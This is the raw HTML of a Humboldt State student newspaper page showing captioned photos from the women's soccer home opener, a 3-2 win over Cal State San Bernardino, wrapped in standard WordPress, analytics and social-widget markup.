<!DOCTYPE html>
<html lang="en-US" prefix="og: http://ogp.me/ns#">
<head>
<meta charset="UTF-8" />
<title>Women&#8217;s Soccer Home Opener | The Lumberjack</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://thelumberjack.org/xmlrpc.php" />
<link rel='dns-prefetch' href='//maps.google.com' />
<link rel='dns-prefetch' href='//apis.google.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="The Lumberjack &raquo; Feed" href="http://thelumberjack.org/feed/" />
<link rel="alternate" type="application/rss+xml" title="The Lumberjack &raquo; Comments Feed" href="http://thelumberjack.org/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="The Lumberjack &raquo; Women&#8217;s Soccer Home Opener Comments Feed" href="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/thelumberjack.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.6.1"}};
			!function(a,b,c){function d(a){var c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600 32px Arial",a){case"flag":return i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='sweetcaptcha_Stylesheet-css'  href='http://thelumberjack.org/wp-content/plugins/sweetcaptcha-revolutionary-free-captcha-service/css/style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='cptch_stylesheet-css'  href='http://thelumberjack.org/wp-content/plugins/captcha/css/front_end_style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://thelumberjack.org/wp-includes/css/dashicons.min.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='cptch_desktop_style-css'  href='http://thelumberjack.org/wp-content/plugins/captcha/css/desktop_style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='jquery-ui-css'  href='http://thelumberjack.org/wp-content/plugins/contact-form-maker/css/jquery-ui-1.10.3.custom.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='jquery-ui-spinner-css'  href='http://thelumberjack.org/wp-content/plugins/contact-form-maker/css/jquery-ui-spinner.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='form_maker_calendar-jos-css'  href='http://thelumberjack.org/wp-content/plugins/contact-form-maker/css/calendar-jos.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='form_maker_frontend-css'  href='http://thelumberjack.org/wp-content/plugins/contact-form-maker/css/form_maker_frontend.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='arevico_scsfbcss-css'  href='http://thelumberjack.org/wp-content/plugins/facebook-page-promoter-lightbox/includes/featherlight/featherlight.min.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='googlefonts-css'  href='http://fonts.googleapis.com/css?family=Oswald:400,700&subset=latin' type='text/css' media='all' />
<link rel='stylesheet' id='wp-polls-css'  href='http://thelumberjack.org/wp-content/plugins/wp-polls/polls-css.css?ver=2.73.1' type='text/css' media='all' />
<style id='wp-polls-inline-css' type='text/css'>
.wp-polls .pollbar {
	margin: 1px;
	font-size: 6px;
	line-height: 8px;
	height: 8px;
	background-image: url('http://thelumberjack.org/wp-content/plugins/wp-polls/images/default/pollbg.gif');
	border: 1px solid #c8c8c8;
}

</style>
<link rel='stylesheet' id='tie-style-css'  href='http://thelumberjack.org/wp-content/themes/jarida/style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='Oswald-css'  href='http://fonts.googleapis.com/css?family=Oswald%3Aregular%2C700&#038;ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='wordpress-popular-posts-css'  href='http://thelumberjack.org/wp-content/plugins/wordpress-popular-posts/style/wpp.css?ver=3.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='tablepress-default-css'  href='http://thelumberjack.org/wp-content/plugins/tablepress/css/default.min.css?ver=1.7' type='text/css' media='all' />
<link rel='stylesheet' id='sedlex_styles-css'  href='http://thelumberjack.org/wp-content/sedlex/inline_styles/50d977f2737fc576af4083ea1b75dce3938463fe.css?ver=20160921' type='text/css' media='all' />
<!-- This site uses the Google Analytics by MonsterInsights plugin v5.5.2 - Universal enabled - https://www.monsterinsights.com/ -->
<script type="text/javascript">
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
		(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
		m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker');

	__gaTracker('create', 'UA-84292408-1', 'auto');
	__gaTracker('set', 'forceSSL', true);
	__gaTracker('set', 'anonymizeIp', true);
	__gaTracker('require', 'displayfeatures');
	__gaTracker('send','pageview');

</script>
<!-- / Google Analytics by MonsterInsights -->
<!--[if lte IE 6]> <style type="text/css">.cantembedplus{display:none;}</style><![endif]--><script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script><script>jQueryWP = jQuery;</script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/sweetcaptcha-revolutionary-free-captcha-service/js/swtcptcf.js?ver=4.6.1'></script>
<script type='text/javascript' src='https://maps.google.com/maps/api/js?v=3.exp&#038;key&#038;ver=4.6.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/if_gmap_front_end.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/jelly.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/file-upload.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/calendar/calendar.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/calendar/calendar_function.js?ver=4.6.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var fm_objectL10n = {"plugin_url":"http:\/\/thelumberjack.org\/wp-content\/plugins\/contact-form-maker"};
/* ]]> */
</script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/main_div_front_end.js?ver=cfm-1.8.35'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/facebook-page-promoter-lightbox/includes/featherlight/featherlight.min.js?ver=4.6.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var lb_l_ret = {"width":"400","height":"255","delay":"3500","coc":"0","fb_id":"297377880636","cooc":"0","display_on_page":"1","display_on_post":"1","display_on_homepage":"1","display_on_archive":"1","show_once":"10"};
/* ]]> */
</script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/facebook-page-promoter-lightbox/includes/launch/launch.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='https://apis.google.com/js/plusone.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/sedlex/inline_scripts/6818785009f592a40dcb86a14808c6cc7b06891e.js?ver=20160921'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/swfobject.js?ver=2.2-20120417'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/podcasting/player/audio-player-noswfobject.js?ver=2.0'></script>
<link rel='https://api.w.org/' href='http://thelumberjack.org/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://thelumberjack.org/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://thelumberjack.org/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.6.1" />
<meta name="generator" content="Seriously Simple Podcasting 1.14.10" />
<link rel="canonical" href="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/" />
<link rel='shortlink' href='http://thelumberjack.org/?p=14086' />
<link rel="alternate" type="application/json+oembed" href="http://thelumberjack.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fthelumberjack.org%2F2016%2F09%2F20%2Fwomens-soccer-home-opener%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://thelumberjack.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fthelumberjack.org%2F2016%2F09%2F20%2Fwomens-soccer-home-opener%2F&#038;format=xml" />
		<!-- Podcasting 2.4: http://podcastingplugin.com/ -->
		<script type="text/javascript">
			AudioPlayer.setup("http://thelumberjack.org/wp-content/plugins/podcasting/player/player.swf", {  
				width: 290			});
		</script>
		
<link rel="alternate" type="application/rss+xml" title="Podcast RSS feed" href="http://thelumberjack.org/feed/podcast" />

<style type='text/css' media='screen'>
	h1{ font-family:"Oswald", arial, sans-serif;}
	h2{ font-family:"Oswald", arial, sans-serif;}
	h3{ font-family:"Oswald", arial, sans-serif;}
	h4{ font-family:"Oswald", arial, sans-serif;}
</style>
<!-- fonts delivered by Wordpress Google Fonts, a plugin by Adrian3.com --><link rel="shortcut icon" href="http://thelumberjack.org/wp-content/uploads/2014/04/Screen-Shot-2014-04-14-at-3.06.32-PM-150x150.png" title="Favicon" /><meta property="og:title" content="Women&#8217;s Soccer Home Opener"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="Photos and Captions by: James Towney |



&amp;nbsp;



&amp;nbsp;



&amp;nbsp;



..."/>
<meta property="og:url" content="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/"/>
<meta property="og:site_name" content="The Lumberjack"/>
<meta property="og:image" content="http://thelumberjack.org/wp-content/uploads/2016/09/KickTheBall-620x330.jpg" />
<!--[if IE]>
<script type="text/javascript">jQuery(document).ready(function (){ jQuery(".menu-item").has("ul").children("a").attr("aria-haspopup", "true");});</script>
<![endif]-->
<!--[if lt IE 9]>
<script src="http://thelumberjack.org/wp-content/themes/jarida/js/html5.js"></script>
<script src="http://thelumberjack.org/wp-content/themes/jarida/js/selectivizr-min.js"></script>
<![endif]-->
<!--[if IE 8]>
<link rel="stylesheet" type="text/css" media="all" href="http://thelumberjack.org/wp-content/themes/jarida/css/ie8.css" />
<![endif]-->
<script type='text/javascript'>
	/* <![CDATA[ */
	var tievar = {'go_to' : 'Go to...'};
	var tie = {"ajaxurl":"http://thelumberjack.org/wp-admin/admin-ajax.php" , "your_rating":"Your Rating:"};
	/* ]]> */
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
<style type="text/css" media="screen"> 

body{
background-image: url('http://thelumberjack.org/wp-content/uploads/2014/01/Trees_background2.jpg') !important; 
}
	#main-nav ul li.current-menu-item a,
	#main-nav ul li.current-menu-item a:hover,
	#main-nav ul li.current-menu-parent a,
	#main-nav ul li.current-menu-parent a:hover,
	#main-nav ul li.current-page-ancestor a,
	#main-nav ul li.current-page-ancestor a:hover,
	.pagination span.current,
	.ei-slider-thumbs li.ei-slider-element,
	.breaking-news span,
	.ei-title h2,h2.cat-box-title,
	a.more-link,.scroll-nav a,
	.flex-direction-nav a,
	.tagcloud a:hover,
	#tabbed-widget ul.tabs li.active a,
	.slider-caption h2, .full-width .content .slider-caption h2,
	.review-percentage .review-item span span,.review-final-score,
	.woocommerce span.onsale, .woocommerce-page span.onsale ,
	.woocommerce .widget_price_filter .ui-slider .ui-slider-handle, .woocommerce-page .widget_price_filter .ui-slider .ui-slider-handle,
	.button,a.button,#main-content input[type="submit"],#main-content input[type="submit"]:focus, span.onsale {
		background-color:#056937 !important;
	}
	::-webkit-scrollbar-thumb{background-color:#056937 !important;}
	#main-nav,.top-nav {border-bottom-color: #056937;}
	.cat-box , .footer-bottom .container{border-top-color: #056937;}
a {
		text-decoration: none;}
a:hover {
		text-decoration: underline;}
.top-nav ul li a , .top-nav ul ul a {
		text-shadow: 0 1px 1px #056a37 !important;}

	#main-nav ul li.current-menu-item a,
	#main-nav ul li.current-menu-item a:hover,
	#main-nav ul li.current-menu-parent a,
	#main-nav ul li.current-menu-parent a:hover,
	#main-nav ul li.current-page-ancestor a,
	#main-nav ul li.current-page-ancestor a:hover,
	.pagination span.current,
	.ei-slider-thumbs li.ei-slider-element,
	.breaking-news span,
	.ei-title h2,h2.cat-box-title,
	a.more-link,.scroll-nav a,
	.flex-direction-nav a,
	.tagcloud a:hover,
	#tabbed-widget ul.tabs li.active a,
	.slider-caption h2, .full-width .content .slider-caption h2,
	.review-percentage .review-item span span,.review-final-score,
	.woocommerce span.onsale, .woocommerce-page span.onsale ,
	.woocommerce .widget_price_filter .ui-slider .ui-slider-handle, .woocommerce-page .widget_price_filter .ui-slider .ui-slider-handle,
	.button,a.button,#main-content input[type="submit"],#main-content input[type="submit"]:focus, span.onsale {
		background-color:#056937 !important;
	}
	::-webkit-scrollbar-thumb{background-color:#056937 !important;}
	#main-nav,.top-nav {border-bottom-color: #056937;}
	.cat-box , .footer-bottom .container{border-top-color: #056937;}


</style> 

				<!-- WordPress Popular Posts v3.3.4 -->
				<script type="text/javascript">

					var sampling_active = 0;
					var sampling_rate   = 100;
					var do_request = false;

					if ( !sampling_active ) {
						do_request = true;
					} else {
						var num = Math.floor(Math.random() * sampling_rate) + 1;
						do_request = ( 1 === num );
					}

					if ( do_request ) {

						/* Create XMLHttpRequest object and set variables */
						var xhr = ( window.XMLHttpRequest )
						  ? new XMLHttpRequest()
						  : new ActiveXObject( "Microsoft.XMLHTTP" ),
						url = 'http://thelumberjack.org/wp-admin/admin-ajax.php',
						params = 'action=update_views_ajax&token=8195eab901&wpp_id=14086';
						/* Set request method and target URL */
						xhr.open( "POST", url, true );
						/* Set request header */
						xhr.setRequestHeader( "Content-type", "application/x-www-form-urlencoded" );
						/* Hook into onreadystatechange */
						xhr.onreadystatechange = function() {
							if ( 4 === xhr.readyState && 200 === xhr.status ) {
								if ( window.console && window.console.log ) {
									window.console.log( xhr.responseText );
								}
							}
						};
						/* Send request */
						xhr.send( params );

					}

				</script>
				<!-- End WordPress Popular Posts v3.3.4 -->
					<link rel="alternate" type="application/rss+xml" title="Podcast: KRFH News" href="http://thelumberjack.org/feed/podcast/" />
<script src='//connect.facebook.net/en_EN/all.js#xfbml=1'></script></head>
<body id="top" class="single single-post postid-14086 single-format-standard">
	<div class="background-cover"></div>
	<div class="wrapper full-site">
				<div class="top-nav fade-in animated1 head_brnews">
			<div class="container">
				<div class="search-block">
					<form method="get" id="searchform" action="http://thelumberjack.org/">
						<button class="search-button" type="submit" value="Search"></button>	
						<input type="text" id="s" name="s" value="Search..." onfocus="if (this.value == 'Search...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Search...';}"  />
					</form>
				</div><!-- .search-block /-->
						<div class="social-icons icon_flat">
		<a class="tooldown" title="Facebook" href="http://www.facebook.com/HSULumberjack" target="_blank"><i class="tieicon-facebook"></i></a><a class="tooldown" title="Twitter" href="http://twitter.com/HSULumberjack" target="_blank"><i class="tieicon-twitter"></i></a><a class="tooldown" title="Flickr" href="http://flickr.com/thejacknews" target="_blank"><i class="tieicon-flickr"></i></a><a class="tooldown" title="Tumblr" href="http://hsulumberjack.tumblr.com/" target="_blank"><i class="tieicon-tumblr"></i></a><a class="tooldown" title="instagram" href="http://instagram.com/hsulumberjack" target="_blank"><i class="tieicon-instagram"></i></a>	</div>

				
					
	<div class="breaking-news">
		<span>Don't Miss</span>
				
					<ul>
							<li><a href="http://thelumberjack.org/2016/09/20/14131/" title="Students clean local beaches">Students clean local beaches</a></li>
							<li><a href="http://thelumberjack.org/2016/09/20/protectors-of-standing-rock/" title="Protectors of Standing Rock">Protectors of Standing Rock</a></li>
							<li><a href="http://thelumberjack.org/2016/09/20/finding-an-edge/" title="Finding an edge">Finding an edge</a></li>
							<li><a href="http://thelumberjack.org/2016/09/16/hsu-native-american-students-win-morongo-scholarship/" title="HSU Native American Students win Morongo Scholarship">HSU Native American Students win Morongo Scholarship</a></li>
							<li><a href="http://thelumberjack.org/2016/09/13/sunrise-ceremony-at-the-potowat-garden/" title="Sunrise Ceremony at the Potowat Garden">Sunrise Ceremony at the Potowat Garden</a></li>
							<li><a href="http://thelumberjack.org/2016/09/12/hsu-in-top-10-percent/" title="Humboldt State in top 10 percent">Humboldt State in top 10 percent</a></li>
							<li><a href="http://thelumberjack.org/2016/09/12/jacks-take-a-seat-with-kaepernick-at-hsus-first-home-game/" title="Jacks Take A Seat With Kaepernick At HSU’s First Home Game">Jacks Take A Seat With Kaepernick At HSU’s First Home Game</a></li>
							<li><a href="http://thelumberjack.org/2016/09/09/north-country-fair-strives-for-zero-waste/" title="North Country Fair Strives For Zero Waste">North Country Fair Strives For Zero Waste</a></li>
							<li><a href="http://thelumberjack.org/2016/09/08/i-street-block-party-in-arcata-benefits-a-small-town-in-nicaragua/" title="I Street Block Party in Arcata Benefits a Small Town in Nicaragua">I Street Block Party in Arcata Benefits a Small Town in Nicaragua</a></li>
							<li><a href="http://thelumberjack.org/2016/09/08/humboldt-state-student-arrested-for-dui-hit-and-killed-pedestrian/" title="Humboldt State student arrested for suspicion of DUI and possibly hit and killed a pedestrian">Humboldt State student arrested for suspicion of DUI and possibly hit and killed a pedestrian</a></li>
						</ul>
					
						<script type="text/javascript">
			jQuery(document).ready(function(){
								createTicker(); 
							});
		</script>
	</div> <!-- .breaking-news -->				
			</div>
		</div><!-- .top-menu /-->
				

		<div class="container">	
		<header id="theme-header">
		<div class="header-content fade-in animated1">
			<div class="logo" style="margin-top:3px">
			<h2>								<a title="The Lumberjack" href="http://thelumberjack.org/">
					<img src="http://thelumberjack.org/wp-content/uploads/2016/01/webmasthead-copy-1024x180.jpg" alt="The Lumberjack" /><strong>The Lumberjack Serving the Humboldt State University campus and community since 1929</strong>
				</a>
			</h2>			</div><!-- .logo /-->
						<div class="clear"></div>
		</div>	
									<nav id="main-nav" class="fade-in animated2">
				<div class="container">				
				<div class="main-menu"><ul id="menu-featured" class="menu"><li id="menu-item-555" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/news/">News</a></li>
<li id="menu-item-556" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/life_and_arts/">Life &#038; Arts</a></li>
<li id="menu-item-11714" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/science/">Science</a></li>
<li id="menu-item-557" class="menu-item  menu-item-type-taxonomy  menu-item-object-category  current-post-ancestor  current-menu-parent  current-post-parent"><a href="http://thelumberjack.org/category/sports/">Sports</a></li>
<li id="menu-item-558" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/opinion/">Opinion</a></li>
<li id="menu-item-5937" class="menu-item  menu-item-type-post_type  menu-item-object-page"><a href="http://krfh.net/" onclick="__gaTracker('send', 'event', 'outbound-widget', 'http://krfh.net/', 'KRFH');">KRFH</a></li>
<li id="menu-item-591" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/archive/">Archive</a></li>
<li id="menu-item-2405" class="menu-item  menu-item-type-post_type  menu-item-object-page"><a href="http://thelumberjack.org/advertise-with-us/">Advertise with us</a></li>
<li id="menu-item-2406" class="menu-item  menu-item-type-post_type  menu-item-object-page  menu-item-has-children"><a href="http://thelumberjack.org/contact/">Contact</a>
<ul class="sub-menu">
	<li id="menu-item-2407" class="menu-item  menu-item-type-post_type  menu-item-object-page"><a href="http://thelumberjack.org/contact/contact-our-editorial-staff/">Contact Our Editorial Staff</a></li>
	<li id="menu-item-563" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/staff-bios/">Staff Bios</a></li>
</ul> <!--End Sub Menu -->
</li>
</ul></div>				</div>
			</nav><!-- .main-nav /-->
		</header><!-- #header /-->
	
	<div id="main-content" class="container fade-in animated3 sidebar-narrow-right"><div class="content-wrap">
	<div class="content">
		<div xmlns:v="http://rdf.data-vocabulary.org/#"  id="crumbs"><span typeof="v:Breadcrumb"><a rel="v:url" property="v:title" class="crumbs-home" href="http://thelumberjack.org"><i class="tieicon-home"></i>Home</a></span> / <span typeof="v:Breadcrumb"><a rel="v:url" property="v:title" href="http://thelumberjack.org/category/sports/">Sports</a></span> / <span class="current">Women&#8217;s Soccer Home Opener</span></div>		
		
				
				
						
		<article class="post-listing post-14086 post type-post status-publish format-standard has-post-thumbnail hentry category-sports tag-college-creek-field tag-hsu-soccer tag-humboldt-state tag-james-towney tag-soccer tag-womens-soccer">
				

			<div class="post-inner">
				<h1 class="name post-title entry-title" itemprop="itemReviewed" itemscope itemtype="http://schema.org/Thing"><span itemprop="name">Women&#8217;s Soccer Home Opener</span></h1>

						
<p class="post-meta">
	
	<span class="post-cats">in  <a href="http://thelumberjack.org/category/sports/" rel="category tag">Sports</a></span>
	
		
	 <span class="tie-date">1 hour ago</span>	
	<span class="post-comments"><a href="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/#respond">0</a></span>
<span class="post-views">24 Views</span> </p>
<div class="clear"></div>
	
				<div class="entry">
					
							<input type='hidden' class='forceUpdateSocialLinkz_id' value='14086'/>
				<input type='hidden' class='forceUpdateSocialLinkz_id' value='14086'/>
		<div class='social_linkz'>   							<span id="fb-root"></span><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/" send="false" layout="button_count" width="35" show_faces="false" action="like" font=""></fb:like>								<a href="http://twitter.com/share" class="twitter-share-button" data-text="[Blog] Women's Soccer Home Opener - http://thelumberjack.org/?p=14086 (via )" data-url="http%3A%2F%2Fthelumberjack.org%2F%3Fp%3D14086" data-count="none"  >Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>									<a rel="nofollow" target="_blank" href="#" title="Print this page">						<img onclick="window.print();return false;" class="lnk_social_linkz" src="http://thelumberjack.org/wp-content/plugins//social-linkz/img/lnk_print.png" alt="Print" height="24" width="24"/></a>										<a rel="nofollow" target="_blank" href="#" title="Mail">						<img onclick="openEmailSocialLinkz('5432bba0eb04c29141154097f54e000a8743d4f5');return false;" class="lnk_social_linkz" src="http://thelumberjack.org/wp-content/plugins//social-linkz/img/lnk_mail.png" alt="Mail" height="24" width="24"/></a>					<div id="mask5432bba0eb04c29141154097f54e000a8743d4f5" class="social_mask"></div>					<div id="dialog5432bba0eb04c29141154097f54e000a8743d4f5" class="social_window">						<div id="innerdialog5432bba0eb04c29141154097f54e000a8743d4f5">							<h3>Send this article by email</h3>							<p class='textEmailSocialLinkz'>What is your name?</p>							<p><input name="nameSocialLinkz5432bba0eb04c29141154097f54e000a8743d4f5" id="nameSocialLinkz5432bba0eb04c29141154097f54e000a8743d4f5" /></p>							<p class='textEmailSocialLinkz'>Please indicate below the emails to which you want to send this article: <b>Women's Soccer Home Opener</b></p>							<p><textarea name="emailSocialLinkz5432bba0eb04c29141154097f54e000a8743d4f5" id="emailSocialLinkz5432bba0eb04c29141154097f54e000a8743d4f5" rows="5"></textarea></p>							<p class='closeEmailSocialLinkz'>Enter one email per line. No more than 5 emails.</p>							<p class='sendEmailSocialLinkz'><a href="#" title="Close" onclick="sendEmailSocialLinkz('5432bba0eb04c29141154097f54e000a8743d4f5', 14086);return false;"><span class='sendEmailSocialLinkz'>Send</span></a></p>						</div>						<p class='closeEmailSocialLinkz'><a href="#" title="Close" onclick="closeEmailSocialLinkz('5432bba0eb04c29141154097f54e000a8743d4f5');return false;"><span class='closeEmailSocialLinkz'>Close</span></a></p>					</div>							</div><p>Photos and Captions by: James Towney |</p>
<div id="attachment_14101" style="width: 310px" class="wp-caption aligncenter"><img class="size-medium wp-image-14101" src="http://thelumberjack.org/wp-content/uploads/2016/09/Number7CrazyFace-300x199.jpg" alt="Midfielder Rose Harman kicks the ball away from San Bernardino’s Sarah Bradley in Humboldt State’s 3-2 home opening win over the Coyotes on Sept. 16 at College Creek Field." width="300" height="199" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/Number7CrazyFace-300x199.jpg 300w, http://thelumberjack.org/wp-content/uploads/2016/09/Number7CrazyFace-1024x680.jpg 1024w, http://thelumberjack.org/wp-content/uploads/2016/09/Number7CrazyFace.jpg 1200w" sizes="(max-width: 300px) 100vw, 300px" /><p class="wp-caption-text">Midfielder Rose Harman kicks the ball away from San Bernardino’s Sarah Bradley in Humboldt State’s 3-2 home opening win over the Coyotes on Sept. 16 at College Creek Field.</p></div>
<p>&nbsp;</p>
<div id="attachment_14100" style="width: 310px" class="wp-caption aligncenter"><img class="size-medium wp-image-14100" src="http://thelumberjack.org/wp-content/uploads/2016/09/MoreFunnyFaces-300x199.jpg" alt="Humboldt’s Kylie Forbes and opponant Gabby Evaristo jostle in the air for the ball on Sept. 19 at College Creek Field in the home opener for HSU womens soccer against Cal State San Bernardino." width="300" height="199" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/MoreFunnyFaces-300x199.jpg 300w, http://thelumberjack.org/wp-content/uploads/2016/09/MoreFunnyFaces-1024x680.jpg 1024w, http://thelumberjack.org/wp-content/uploads/2016/09/MoreFunnyFaces.jpg 1200w" sizes="(max-width: 300px) 100vw, 300px" /><p class="wp-caption-text">Humboldt’s Kylie Forbes and opponant Gabby Evaristo jostle in the air for the ball on Sept. 19 at College Creek Field in the home opener for HSU womens soccer against Cal State San Bernardino.</p></div>
<p>&nbsp;</p>
<div id="attachment_14099" style="width: 310px" class="wp-caption aligncenter"><img class="size-medium wp-image-14099" src="http://thelumberjack.org/wp-content/uploads/2016/09/LookingForSomeoneToPassTo-300x199.jpg" alt="Madison Barnett out works San Bernardino’s Megan Todd and attempts to put the ball in the middle for a shot on goal Sept. 19 at College Creek Field." width="300" height="199" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/LookingForSomeoneToPassTo-300x199.jpg 300w, http://thelumberjack.org/wp-content/uploads/2016/09/LookingForSomeoneToPassTo-1024x680.jpg 1024w, http://thelumberjack.org/wp-content/uploads/2016/09/LookingForSomeoneToPassTo.jpg 1200w" sizes="(max-width: 300px) 100vw, 300px" /><p class="wp-caption-text">Madison Barnett out works San Bernardino’s Megan Todd and attempts to put the ball in the middle for a shot on goal Sept. 19 at College Creek Field.</p></div>
<p>&nbsp;</p>
<div id="attachment_14098" style="width: 310px" class="wp-caption aligncenter"><img class="size-medium wp-image-14098" src="http://thelumberjack.org/wp-content/uploads/2016/09/KickTheBall-300x199.jpg" alt="Humboldt’s Jensen Smith takes a shot on the goal against San Bernardino on Sept. 16 at College Creek Field." width="300" height="199" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/KickTheBall-300x199.jpg 300w, http://thelumberjack.org/wp-content/uploads/2016/09/KickTheBall-1024x680.jpg 1024w, http://thelumberjack.org/wp-content/uploads/2016/09/KickTheBall.jpg 1200w" sizes="(max-width: 300px) 100vw, 300px" /><p class="wp-caption-text">Humboldt’s Jensen Smith takes a shot on the goal against San Bernardino on Sept. 16 at College Creek Field.</p></div>
<p>&nbsp;</p>
